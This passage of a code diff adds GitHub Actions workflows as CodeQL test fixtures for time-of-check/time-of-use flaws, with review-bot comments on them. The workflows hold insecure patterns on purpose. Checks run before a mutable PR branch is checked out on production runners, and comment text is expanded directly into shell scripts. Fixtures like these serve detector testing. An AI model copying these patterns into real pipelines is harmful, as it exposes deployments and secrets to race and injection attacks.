+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml 
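Review bot: The `security-checks` job's `if:` gates on `github.event.pull_request.author_association`, but the workflow is triggered by `issue_comment`, whose payload as far as I know has no top-level `pull_request` object (the populated fields are `github.event.comment.author_association` and `github.event.issue.author_association`); each of the four `!=` comparisons is then against an empty value and always true, so the gate reduces to the comment-body, label and bot checks. If the fixture is meant to model a real association gate, `github.event.comment.author_association != 'FIRST_TIMER'` (and likewise for the other three values) is the field that is actually set; if it is meant to reproduce the upstream workflow as-is, a comment saying so would keep readers from copying it as a pattern. The same expression is used in the `security-checks` job of test3.yml, test5.yml and test6.yml. Separately, the push-time guard runs in `security-checks` on `ubuntu-latest` while `deploy` later resolves and checks out the mutable `head_ref` in a second job, which I take to be the check-then-use window this fixture exists to exercise; a comment naming that as the expected finding would help.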
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 000000000000..9444ad0b627c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml 
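Review bot: In the `security-checks` job, `full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)"` extends the keyword allowlist with the directory listing of the tree checked out two steps earlier from `steps.comment-branch.outputs.head_ref`, so part of the allowlist is read from the very PR whose command is being gated, and the gate runs after the mutable-ref checkout rather than before it. If that ordering is the point of the fixture (a check that happens after the checkout is what CWE-367 is about) a comment saying so would help; otherwise moving `Check comment keywords` ahead of `Checkout PR branch` and deriving the model list from a trusted ref is the fix. In the `Create image`, `Push image` and `Get pipeline info from comment` steps, `${{ github.event.comment.body }}` is expanded directly into the `run:` script, whereas the rest of the file passes it through the `COMMENT_BODY` env var; `model=$(echo "$COMMENT_BODY" | sed 's/.*kickoff //' | sed 's/ .*//')` with `COMMENT_BODY: ${{ github.event.comment.body }}` under `env:` keeps the body out of the script text. test6.yml repeats both patterns.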
@@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 000000000000..e3e557cc5112 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml 
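Review bot: test4.yml is test1.yml with the `pushed_at` comparison removed from the `Get environment from comment` step, and test5.yml stands in the same relation to test2.yml, but nothing in either file records that this is the intended contrast. A one-line header comment in each, e.g. `# Same as test1.yml without the time-of-push guard`, would make the pairing and the expected difference in query results explicit. In the `Check comment keywords` step, `list_subset` is invoked inside a command substitution in the `if` condition rather than called directly, which relies on the exit status of an empty command being that of the last substitution, and the literal word `echo` is passed into both lists; `if list_subset "$PR_COMMENT_ALLOW_LIST" "$COMMENT_BODY"; then` is the direct form, though changing a fixture copied from a live workflow is a judgement call.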
@@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ 
steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: 
slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 000000000000..4a6d1452af24 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml 
@@ -0,0 +1,253 @@
+name: Kickoff custom pipeline
+
+on:
+
+ issue_comment:
+ types: [created]
+
+jobs:
+
+ security-checks:
+
+ name: Carry out security checks
+ if: >-
+ ${{
+ github.event.issue.pull_request &&
+ contains(github.event.comment.body, '/kickoff') &&
+ contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') &&
+ github.event.comment.user.type != 'Bot' &&
+ github.event.pull_request.author_association != 'FIRST_TIMER' &&
+ github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' &&
+ github.event.pull_request.author_association != 'MANNEQUIN' &&
+ github.event.pull_request.author_association != 'NONE'
+ }}
+
+ runs-on: ubuntu-latest
+
+ defaults:
+ run:
+ shell: bash
+
+ permissions:
+ contents: write
+ issues: write
+ pull-requests: write
+
+ steps:
+
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0
+ id: comment-branch
+
+ - name: Checkout PR branch
+ uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+
+ - name: Install GH CLI
+ uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0
+
+ - name: Check comment keywords
+ env:
+ COMMENT_BODY: ${{ github.event.comment.body }}
+ PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }}
+ run: |
+ function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; }
+ full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)"
+
+ if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then
+ echo "Command keywords allowed. Proceeding!"
+ else
+ echo "Command keywords not allowed. Skipping!"
+ exit 1
+ fi
+
+ docker-environment-creation:
+
+ name: Build and push docker image
+ needs: security-checks
+ if: >-
+ ${{
+ contains(github.event.comment.body, 'rebuild') &&
+ contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') &&
+ needs.security-checks.result == 'success'
+ }}
+ runs-on: [self-hosted, production]
+
+ permissions:
+ contents: write
+
+ defaults:
+ run:
+ # Run bash like it came from an interactive login, to make it so that
+ # the .bashrc gets loaded.
+ shell: bash -l {0}
+
+ steps:
+
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2
+ id: comment-branch
+
+ - name: Checkout PR branch
+ uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+
+ - name: Log into Azure
+ uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0
+ with:
+ creds: ${{ secrets.AZURE_CREDENTIALS }}
+
+ - name: Container registry login
+ run: |
+ echo "Logging into $REGISTRY"
+ az acr login --name ${REGISTRY}
+ env:
+ REGISTRY: ${{ secrets.DOCKER_REGISTRY }}
+
+ - name: Prune old images
+ run: |
+ docker system prune -a -f
+
+ - name: Create image
+ run: |
+ model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//')
+ script/build_aml_image -m $model
+
+ - name: Push image
+ run: |
+ model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//')
+ script/push_aml_image -m $model
+
+ kickoff-pipeline:
+
+ name: Kickoff pipeline
+ needs: [security-checks, docker-environment-creation]
+ if: >-
+ ${{
+ always() &&
+ needs.security-checks.result == 'success' &&
+ needs.docker-environment-creation.result != 'failure' &&
+ needs.docker-environment-creation.result != 'cancelled'
+ }}
+
+ runs-on: [self-hosted, production]
+
+ permissions:
+ contents: write
+ issues: write
+ pull-requests: write
+ statuses: write
+
+ defaults:
+ run:
+ # Run bash like it came from an interactive login, to make it so that
+ # the .bashrc gets loaded.
+ shell: bash -l {0}
+
+ steps:
+
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2
+ id: comment-branch
+
+ - name: Set latest commit status as pending
+ uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1
+ with:
+ sha: ${{ steps.comment-branch.outputs.head_sha }}
+ token: ${{ secrets.GITHUB_TOKEN }}
+ status: pending
+
+ - name: Checkout PR branch
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+
+ - name: Get pipeline info from comment
+ id: pipeline-info
+ run: |
+ model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \
+ scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \
+ echo "mdl=$model" >> $GITHUB_OUTPUT
+ if [[ $scheduling == 1 ]]; then
+ echo "schedule=True" >> $GITHUB_OUTPUT
+ else
+ echo "schedule=False" >> $GITHUB_OUTPUT
+ fi
+
+ - name: Get email of actor
+ id: email
+ run: |
